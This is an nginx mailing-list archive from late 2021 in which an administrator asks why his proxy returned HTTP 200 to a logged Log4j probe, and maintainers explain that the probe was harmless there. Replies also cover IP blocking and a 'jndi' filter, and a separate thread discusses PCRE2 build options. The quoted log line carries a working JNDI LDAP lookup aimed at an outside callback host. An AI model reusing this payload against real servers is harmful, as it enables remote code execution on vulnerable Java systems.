mauro.tridici at cmcc.it > Sent: December 29, 2021 6:55 AM > To: nginx at nginx.org > Reply-to: nginx at nginx.org > Subject: Help request about Log4j attack attempts and NGINX logs meaning > > > > > Dear Users, > > > I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. > Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. > In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. > > > At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. > Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. > Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. > > > Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? > > > You can see below the mail notification I received: > > > > Attack Notification. > 2021 Dec 28 20:45:59 > > Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." > Src IP: 166.137.252.110 > Portion of the log(s): > > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" > > > Thank you in advance, > Mauro > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From Justin.Slaughter at charter.com Wed Dec 29 18:12:17 2021 From: Justin.Slaughter at charter.com (Slaughter, Justin D) Date: Wed, 29 Dec 2021 18:12:17 +0000 Subject: [EXTERNAL] Re: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: Message-ID: <26EAC8C1-B851-4551-B4C4-299CCB4A02D4@charter.com> Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". Justin ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. Thank you very much for your reply. I really appreciated it. I?ll wait for the final gurus feedback too. Mauro > On 29 Dec 2021, at 18:03, lists wrote: > > That IP space is certified shady. I detect the occasional hack from them. See > > https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ > > and > > https://wirelessdataspco.org/faq.php > > These wireless companies will do anything for money including leasing their IP space. > > I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. > > I will leave it up to the gurus to parse the log. > > > > > > > Original Message > > > From: mauro.tridici at cmcc.it > Sent: December 29, 2021 6:55 AM > To: nginx at nginx.org > Reply-to: nginx at nginx.org > Subject: Help request about Log4j attack attempts and NGINX logs meaning > > > > > Dear Users, > > > I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. > Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. > In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. > > > At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. > Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. > Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. > > > Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? > > > You can see below the mail notification I received: > > > > Attack Notification. > 2021 Dec 28 20:45:59 > > Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." > Src IP: 166.137.252.110 > Portion of the log(s): > > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" > > > Thank you in advance, > Mauro > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx E-MAIL CONFIDENTIALITY NOTICE: The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. From mdounin at mdounin.ru Wed Dec 29 18:29:51 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 29 Dec 2021 21:29:51 +0300 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Message-ID: Hello! On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: > I have an old instance of NGINX (v.1.10.1) running as proxy > server on a dedicated hardware platform. > Since the proxy service is reachable from internet, it is > constantly exposed to cyber attacks. > In my particular case, it is attacked by a lot of Log4j attack > attempts from several malicious IPs. > > At this moment, an host intrusion detection system (HIDS) is > running and is protecting the NGINX server: it seems it is > blocking every malicious attack attempts. > Anyway, during the last attack mail notification sent by the > HIDS, I noticed that the NGINX server response was ?HTTP/1.1 > 200? and I?m very worried about it. > Log4j and Java packages are NOT installed on the NGINX server > and all the servers behind the proxy are not using Log4j. > > Could you please help me to understand the reason why the NGINX > server answer was ?HTTP/1.1 200?!? > > You can see below the mail notification I received: > > > Attack Notification. > 2021 Dec 28 20:45:59 > > Received From: ?hidden_NGINX_server_IP? > >/var/log/nginx/access.log > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt > detected." > Src IP: 166.137.252.110 > Portion of the log(s): > > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET > /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP > ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a > } > HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" As you can see from the log line, the request is to "/" with some additional request arguments ("?sulgz=..."). As unknown request arguments are usually ignored, it is no surprise that such a request results in 200. -- Maxim Dounin http://mdounin.ru/ From mauro.tridici at cmcc.it Wed Dec 29 18:29:58 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 19:29:58 +0100 Subject: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <26EAC8C1-B851-4551-B4C4-299CCB4A02D4@charter.com> References: <26EAC8C1-B851-4551-B4C4-299CCB4A02D4@charter.com> Message-ID: <70022245-375D-428C-9786-416E79890D84@cmcc.it> Hi Justin, thank you very much for your help. Since I?m a newbie, I would like to ask you additional details in order to ?fix? this behaviour (if it shouuld be fixed). What is the meaning of ?GET /?? Does It mean that the attacker is trying to GET something from the / path of the server (sorry for my stupid question)? How can I check and change the current nginx configuration ? Thank you in advance, Mauro > On 29 Dec 2021, at 19:12, Slaughter, Justin D wrote: > > Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". > > Justin > > ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: > > CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. > > Thank you very much for your reply. I really appreciated it. > I?ll wait for the final gurus feedback too. > > Mauro > >> On 29 Dec 2021, at 18:03, lists wrote: >> >> That IP space is certified shady. I detect the occasional hack from them. See >> >> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ >> >> and >> >> https://wirelessdataspco.org/faq.php >> >> These wireless companies will do anything for money including leasing their IP space. >> >> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. >> >> I will leave it up to the gurus to parse the log. >> >> >> >> >> >> >> Original Message >> >> >> From: mauro.tridici at cmcc.it >> Sent: December 29, 2021 6:55 AM >> To: nginx at nginx.org >> Reply-to: nginx at nginx.org >> Subject: Help request about Log4j attack attempts and NGINX logs meaning >> >> >> >> >> Dear Users, >> >> >> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. >> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. >> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. >> >> >> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. >> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. >> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. >> >> >> Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? >> >> >> You can see below the mail notification I received: >> >> >> >> Attack Notification. >> 2021 Dec 28 20:45:59 >> >> Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log >> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." >> Src IP: 166.137.252.110 >> Portion of the log(s): >> >> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> >> Thank you in advance, >> Mauro >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > E-MAIL CONFIDENTIALITY NOTICE: > The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From mauro.tridici at cmcc.it Wed Dec 29 18:34:01 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 19:34:01 +0100 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Message-ID: Helo Maxim, thank you very much for the explanation. In your opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry) or I should simply ignore it? Many thanks again, Mauro > On 29 Dec 2021, at 19:29, Maxim Dounin wrote: > > Hello! > > On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: > >> I have an old instance of NGINX (v.1.10.1) running as proxy >> server on a dedicated hardware platform. >> Since the proxy service is reachable from internet, it is >> constantly exposed to cyber attacks. >> In my particular case, it is attacked by a lot of Log4j attack >> attempts from several malicious IPs. >> >> At this moment, an host intrusion detection system (HIDS) is >> running and is protecting the NGINX server: it seems it is >> blocking every malicious attack attempts. >> Anyway, during the last attack mail notification sent by the >> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >> 200? and I?m very worried about it. >> Log4j and Java packages are NOT installed on the NGINX server >> and all the servers behind the proxy are not using Log4j. >> >> Could you please help me to understand the reason why the NGINX >> server answer was ?HTTP/1.1 200?!? >> >> You can see below the mail notification I received: >> >> >> Attack Notification. >> 2021 Dec 28 20:45:59 >> >> Received From: ?hidden_NGINX_server_IP? >>> /var/log/nginx/access.log >> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >> detected." >> Src IP: 166.137.252.110 >> Portion of the log(s): >> >> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >> } >> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" > > As you can see from the log line, the request is to "/" with some > additional request arguments ("?sulgz=..."). As unknown request > arguments are usually ignored, it is no surprise that such a > request results in 200. > > -- > Maxim Dounin > http://mdounin.ru/ > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From lists at lazygranch.com Wed Dec 29 22:13:19 2021 From: lists at lazygranch.com (lists) Date: Wed, 29 Dec 2021 14:13:19 -0800 Subject: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <70022245-375D-428C-9786-416E79890D84@cmcc.it> Message-ID: "get" is a html verb also known as method. Most URL requests are gets. https://www.w3schools.com/tags/ref_httpmethods.asp https://nordicapis.com/ultimate-guide-to-all-9-standard-http-methods/ I just know the bare essentials and have web pages that look like the 90's era other than using a little HTML5. Having never used "parameters" I couldn't completely answer your initial question. The only thing I use after an URL is the # for anchors. I don't know what your relay is doing. However many implementations of nginx simply ban dubious IP space. You can also force a captcha. I use a low CPU power VPS for my sercer so I just ban dubious IP space. Firewalls are very kind to the CPU but use a lot of memory to hold the IP space designation and port information. At a minimum I would block all of AWS. I have about 40k different CIDRs I block. All hosting companies or VPS. The dumb hackers are simply spraying IP space. You will see the same message again and again. They are just bots. I only have two servers (VPS) and only one with web and email so I have the time to find hackers and block IP space. Once you block AWS the amount of hacking drops dramatically. I use nginx maps to search for "jndi" and then 444 the requests. I first made sure "jndi" didn't appear by accident in any pages I created. I have scripts to pull all the IPs for 444 returns from the access logs and feed them to a website to look up who controls the IP space. If it is a server or VPS the entire associated IP space gets banned using bgp.hp.net to find the CIDRs. I do this about every two to three weeks since I have so few hack attempts that get past the firewall. Maybe 200 that get past the blocking and 4 to 6 new servers to add to the list. Log4j has two IPs to investigate so I have to handle them by hand unless I can write a better script to get the return IP address. In two weeks I only had three IPs sending Log4j attacks. If you don't want to create your own list of shady IPs there are services that will feed your server firewall IPs to block in real time. I prefer to have total control. ? Original Message ? From: mauro.tridici at cmcc.it Sent: December 29, 2021 10:30 AM To: nginx at nginx.org Reply-to: nginx at nginx.org Subject: Re: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning Hi Justin, thank you very much for your help. Since I?m a newbie, I would like to ask you additional details in order to ?fix? this behaviour? (if it shouuld be fixed). What is the meaning of ?GET /?? Does It mean that the attacker is trying to GET something from the / path of the server (sorry for my stupid question)? How can I check and change the current nginx configuration ? Thank you in advance, Mauro > On 29 Dec 2021, at 19:12, Slaughter, Justin D wrote: > > Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". > > Justin > > ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: > >??? CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. > >??? Thank you very much for your reply. I really appreciated it. >??? I?ll wait for the final gurus feedback too. > >??? Mauro > >> On 29 Dec 2021, at 18:03, lists wrote: >> >> That IP space is certified shady. I detect the occasional hack from them. See >> >> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ >> >> and >> >> https://wirelessdataspco.org/faq.php >> >> These wireless companies will do anything for money including leasing their IP space. >> >> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. >> >> I will leave it up to the gurus to parse the log.? >> >> >> >> >> >> >> ? Original Message? >> >> >> From: mauro.tridici at cmcc.it >> Sent: December 29, 2021 6:55 AM >> To: nginx at nginx.org >> Reply-to: nginx at nginx.org >> Subject: Help request about Log4j attack attempts and NGINX logs meaning >> >> >> >> >> Dear Users, >> >> >> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. >> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. >> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. >> >> >> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. >> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. >> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. >> >> >> Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? >> >> >> You can see below the mail notification I received: >> >> >> >> Attack Notification. >> 2021 Dec 28 20:45:59 >> >> Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log >> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." >> Src IP: 166.137.252.110 >> Portion of the log(s): >> >> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> >> Thank you in advance, >> Mauro >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > >??? _______________________________________________ >??? nginx mailing list >??? nginx at nginx.org >??? http://mailman.nginx.org/mailman/listinfo/nginx > > E-MAIL CONFIDENTIALITY NOTICE: > The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From mauro.tridici at cmcc.it Wed Dec 29 22:46:28 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 23:46:28 +0100 Subject: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: Message-ID: Many thanks for sharing with me your experience. In the next days, I will try to apply your know-how to my particular case. The HIDS I installed is still blocking the attack attempts, but I have some doubts about the ?best practices? needed for the NGINX ?200? answer. Maxim Dounin kindly said that: "As you can see from the log line, the request is to "/" with some additional request arguments ("?sulgz=..."). As unknown request arguments are usually ignored, it is no surprise that such a request results in 200.? Now, I only need to understand if I can ignore this event or I should do something else. Thank you, Mauro > On 29 Dec 2021, at 23:13, lists wrote: > > "get" is a html verb also known as method. Most URL requests are gets. > > https://www.w3schools.com/tags/ref_httpmethods.asp > > https://nordicapis.com/ultimate-guide-to-all-9-standard-http-methods/ > > I just know the bare essentials and have web pages that look like the 90's era other than using a little HTML5. > > Having never used "parameters" I couldn't completely answer your initial question. The only thing I use after an URL is the # for anchors. > > I don't know what your relay is doing. However many implementations of nginx simply ban dubious IP space. You can also force a captcha. I use a low CPU power VPS for my sercer so I just ban dubious IP space. Firewalls are very kind to the CPU but use a lot of memory to hold the IP space designation and port information. At a minimum I would block all of AWS. I have about 40k different CIDRs I block. All hosting companies or VPS. > > The dumb hackers are simply spraying IP space. You will see the same message again and again. They are just bots. > > I only have two servers (VPS) and only one with web and email so I have the time to find hackers and block IP space. Once you block AWS the amount of hacking drops dramatically. > > I use nginx maps to search for "jndi" and then 444 the requests. I first made sure "jndi" didn't appear by accident in any pages I created. > > I have scripts to pull all the IPs for 444 returns from the access logs and feed them to a website to look up who controls the IP space. If it is a server or VPS the entire associated IP space gets banned using bgp.hp.net to find the CIDRs. I do this about every two to three weeks since I have so few hack attempts that get past the firewall. Maybe 200 that get past the blocking and 4 to 6 new servers to add to the list. > > Log4j has two IPs to investigate so I have to handle them by hand unless I can write a better script to get the return IP address. In two weeks I only had three IPs sending Log4j attacks. > > If you don't want to create your own list of shady IPs there are services that will feed your server firewall IPs to block in real time. I prefer to have total control. > > > > > > Original Message > > > From: mauro.tridici at cmcc.it > Sent: December 29, 2021 10:30 AM > To: nginx at nginx.org > Reply-to: nginx at nginx.org > Subject: Re: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning > > > Hi Justin, > > thank you very much for your help. > Since I?m a newbie, I would like to ask you additional details in order to ?fix? this behaviour (if it shouuld be fixed). > > What is the meaning of ?GET /?? Does It mean that the attacker is trying to GET something from the / path of the server (sorry for my stupid question)? > How can I check and change the current nginx configuration ? > > Thank you in advance, > Mauro > >> On 29 Dec 2021, at 19:12, Slaughter, Justin D wrote: >> >> Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". >> >> Justin >> >> ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: >> >> CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. >> >> Thank you very much for your reply. I really appreciated it. >> I?ll wait for the final gurus feedback too. >> >> Mauro >> >>> On 29 Dec 2021, at 18:03, lists wrote: >>> >>> That IP space is certified shady. I detect the occasional hack from them. See >>> >>> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ >>> >>> and >>> >>> https://wirelessdataspco.org/faq.php >>> >>> These wireless companies will do anything for money including leasing their IP space. >>> >>> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. >>> >>> I will leave it up to the gurus to parse the log. >>> >>> >>> >>> >>> >>> >>> Original Message >>> >>> >>> From: mauro.tridici at cmcc.it >>> Sent: December 29, 2021 6:55 AM >>> To: nginx at nginx.org >>> Reply-to: nginx at nginx.org >>> Subject: Help request about Log4j attack attempts and NGINX logs meaning >>> >>> >>> >>> >>> Dear Users, >>> >>> >>> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. >>> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. >>> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. >>> >>> >>> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. >>> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. >>> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. >>> >>> >>> Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? >>> >>> >>> You can see below the mail notification I received: >>> >>> >>> >>> Attack Notification. >>> 2021 Dec 28 20:45:59 >>> >>> Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log >>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." >>> Src IP: 166.137.252.110 >>> Portion of the log(s): >>> >>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >>> >>> >>> Thank you in advance, >>> Mauro >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> >> E-MAIL CONFIDENTIALITY NOTICE: >> The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Thu Dec 30 04:30:04 2021 From: nginx-forum at forum.nginx.org (George) Date: Wed, 29 Dec 2021 23:30:04 -0500 Subject: nginx-1.21.5 In-Reply-To: References: Message-ID: <9652e941a476ece1dc7951955595f66b.NginxMailingListEnglish@forum.nginx.org> Thanks for PCRE2 support! >From what I read Nginx 1.21.5 will default to PCRE2 if found or fallback to PCRE if not You can disable PCRE2 default by passing --without-pcre2 flag - which works fine and ldd $(which nginx) shows libpcre.so.1 => /usr/local/nginx-dep/lib/libpcre.so.1 (0x00007f86c7445000) But is the same true, if you set --without-pcre flag with PCRE2 library installed and detected? As that seems to end up with nginx failing to configure ./configure: error: the HTTP rewrite module requires the PCRE library. You can either disable the module by using --without-http_rewrite_module option or you have to enable the PCRE support. Why is it looking for PCRE when PCRE2 is available? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293170,293198#msg-293198 From maxim at nginx.com Thu Dec 30 07:20:50 2021 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 30 Dec 2021 10:20:50 +0300 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Message-ID: <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> Mauro, Unless you use somewhere in your stack log4j vulnerable software (nginx is not) I don't see anything significant to worry about. Maxim On 29.12.2021 21:34, Mauro Tridici wrote: > Helo Maxim, > > thank you very much for the explanation. > In your opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry) or I should simply ignore it? > > Many thanks again, > Mauro > >> On 29 Dec 2021, at 19:29, Maxim Dounin wrote: >> >> Hello! >> >> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: >> >>> I have an old instance of NGINX (v.1.10.1) running as proxy >>> server on a dedicated hardware platform. >>> Since the proxy service is reachable from internet, it is >>> constantly exposed to cyber attacks. >>> In my particular case, it is attacked by a lot of Log4j attack >>> attempts from several malicious IPs. >>> >>> At this moment, an host intrusion detection system (HIDS) is >>> running and is protecting the NGINX server: it seems it is >>> blocking every malicious attack attempts. >>> Anyway, during the last attack mail notification sent by the >>> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >>> 200? and I?m very worried about it. >>> Log4j and Java packages are NOT installed on the NGINX server >>> and all the servers behind the proxy are not using Log4j. >>> >>> Could you please help me to understand the reason why the NGINX >>> server answer was ?HTTP/1.1 200?!? >>> >>> You can see below the mail notification I received: >>> >>> >>> Attack Notification. >>> 2021 Dec 28 20:45:59 >>> >>> Received From: ?hidden_NGINX_server_IP? >>>> /var/log/nginx/access.log >>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >>> detected." >>> Src IP: 166.137.252.110 >>> Portion of the log(s): >>> >>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >>> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >>> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >>> } >>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> As you can see from the log line, the request is to "/" with some >> additional request arguments ("?sulgz=..."). As unknown request >> arguments are usually ignored, it is no surprise that such a >> request results in 200. >> >> -- >> Maxim Dounin >> http://mdounin.ru/ >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Maxim Konovalov From mdounin at mdounin.ru Thu Dec 30 08:03:04 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Dec 2021 11:03:04 +0300 Subject: nginx-1.21.5 In-Reply-To: <9652e941a476ece1dc7951955595f66b.NginxMailingListEnglish@forum.nginx.org> References: <9652e941a476ece1dc7951955595f66b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello! On Wed, Dec 29, 2021 at 11:30:04PM -0500, George wrote: > Thanks for PCRE2 support! > > From what I read Nginx 1.21.5 will default to PCRE2 if found or fallback to > PCRE if not > > You can disable PCRE2 default by passing --without-pcre2 flag - which works > fine and > > ldd $(which nginx) > > shows > > libpcre.so.1 => /usr/local/nginx-dep/lib/libpcre.so.1 (0x00007f86c7445000) > > But is the same true, if you set --without-pcre flag with PCRE2 library > installed and detected? As that seems to end up with nginx failing to > configure > > ./configure: error: the HTTP rewrite module requires the PCRE library. > You can either disable the module by using --without-http_rewrite_module > option or you have to enable the PCRE support. > > Why is it looking for PCRE when PCRE2 is available? The "--without-pcre" configure option completely disables usage of all versions of the PCRE library, both the original PCRE library and PCRE2. Currently there is not option to disable the original PCRE library while still using PCRE2. Note though that the original PCRE library is not used as long as PCRE2 is available. That is, the only potential difference such an option might introduce is what happens if PCRE2 is not available: either nginx configure will fail, or fallback to using the original PCRE library. -- Maxim Dounin http://mdounin.ru/ From mauro.tridici at cmcc.it Thu Dec 30 08:24:59 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Thu, 30 Dec 2021 09:24:59 +0100 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> Message-ID: <2153E46F-CEA8-44FA-9980-35357D311AA3@cmcc.it> Hello Maxim, Thank you for your reply. This is the information that I need :) Mauro > On 30 Dec 2021, at 08:20, Maxim Konovalov wrote: > > Mauro, > > Unless you use somewhere in your stack log4j vulnerable software (nginx is not) I don't see anything significant to worry about. > > Maxim > > On 29.12.2021 21:34, Mauro Tridici wrote: >> Helo Maxim, >> thank you very much for the explanation. >> In your 